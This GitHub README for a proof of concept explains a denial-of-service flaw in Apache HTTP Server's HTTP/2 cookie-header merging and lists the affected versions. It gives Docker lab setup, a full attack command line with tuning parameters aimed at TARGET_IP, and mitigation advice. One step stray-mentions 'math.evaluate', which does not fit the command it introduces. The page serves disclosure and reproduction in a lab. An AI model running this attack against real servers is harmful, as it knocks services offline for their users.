Skip to content

EQSTLab/CVE-2026-49975

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2026-49975 HTTP/2 Bomb

★ CVE-2026-49975 HTTP/2 Bomb PoC ★

CVE-2026-49975_Demo.mp4

Overview

CVE-2026-49975 is a Denial of Service (DoS) vulnerability in Apache HTTP Server. The vulnerability occurs in the HTTP/2 request handling path, where multiple cookie header fields can be merged without being properly counted against LimitRequestFields. By sending a small HPACK-encoded HTTP/2 request that expands into many cookie header fields, an attacker can force the server to repeatedly allocate memory during Cookie header merging. The attacker can then use HTTP/2 flow control to delay response transmission, keeping the affected streams open and preventing the allocated memory from being released.


Affected Versions

Category Version
Vulnerable Apache HTTP Server 2.4.17 ≤ version ≤ 2.4.67
Patched Apache HTTP Server 2.4.68 or later

Impact

  • Remote Denial of Service (DoS)
  • Excessive memory consumption
  • Delayed or failed processing of normal user requests

Environment

Build and run the vulnerable Apache HTTP Server environment.

docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975

PoC

After starting the vulnerable environment, follow the steps below to reproduce the attack.

Step 1. Monitor server memory usage

docker stats cve-2026-49975

Example output:

CONTAINER ID   NAME             CPU %   MEM USAGE / LIMIT     MEM %
xxxxxxxxxxxx   cve-2026-49975   0.5%    35.2MiB / 8.0GiB      1.7%

Step 2. Run the HTTP/2 Bomb PoC

Send the following expression to math.evaluate (e.g., through the application's calculation input).

python3 poc.py \
  --host TARGET_IP \
  --port 10081 \
  --connections 10 \
  --streams 100 \
  --refs 4091 \
  --initial-window 0 \
  --hold 300 \
  --drip-interval 2 \
  --drip-bytes 1

Step 3. Confirm the result

Check that the Apache container's memory usage increases and remains high while the attack streams are held open.

Mitigation

  • Upgrade Apache HTTP Server to 2.4.68 or later
  • Consider disabling HTTP/2 temporarily if the service does not require it

Analysis

About

HTTP/2 Bomb

Resources

Stars

13 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors